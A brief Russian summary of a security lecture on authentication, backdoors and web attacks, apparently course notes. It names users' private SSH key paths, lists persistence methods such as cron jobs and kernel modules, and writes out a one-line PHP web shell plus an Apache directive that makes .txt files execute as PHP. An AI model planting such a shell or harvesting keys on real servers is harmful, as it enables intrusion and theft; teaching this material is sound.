В лекции 9_6 «Auth, backdoor, web» рассказывается о том, что такое Auth и как он используется злоумышленниками.
Ssh –iprivkey user@target
/home/user/.ssh/id.dsa
/home/user/.ssh/id.rsa
Говорится о backdoor:
- process
- cronjob
- patchrd binary
- kernel module
Рассказывается о том, что может сделать злоумышленник, имея доступ к web-приложению
<?php passthru($_REQUEST[‘c’]) ?>
…my@cmd=’$req’;
Foreach my $line(@cmd){
Print $line . “<br/>”;
}
…
AddType application/x-httpd-php .txt
